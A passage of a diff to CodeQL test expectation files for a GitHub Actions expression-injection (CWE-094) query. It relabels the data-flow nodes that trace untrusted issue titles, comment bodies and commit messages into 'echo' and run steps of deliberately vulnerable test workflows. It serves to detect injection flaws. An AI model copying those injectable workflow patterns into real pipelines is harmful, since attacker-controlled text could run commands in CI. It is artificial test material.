+| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | @@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -130,20 +130,20 @@ nodes | .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | | .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label | job_out ... test }} [job_output] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | semmle.label | ${{ ste ... test }} | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | semmle.label | id: step0 [value] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | semmle.label | id: step1 [MSG] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | semmle.label | ${{ ste ... value}} | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | semmle.label | id: step2 [test] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | semmle.label | ${{step ... s.MSG}} | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -215,7 +215,7 @@ subpaths | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/simple1.yml:15:14:16:50 | \| | .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:15:14:16:50 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/simple2.yml:28:14:31:15 | \| | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:28:14:31:15 | \| | Potential expression injection, which may be controlled by an external user. | | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | .github/workflows/workflow_run.yml:9:12:9:64 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | .github/workflows/workflow_run.yml:10:12:10:70 | echo '$ ... age }}' | Potential expression injection, which may be controlled by an external user. | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 13c81bd08e0..b21ac80574b 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | @@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | 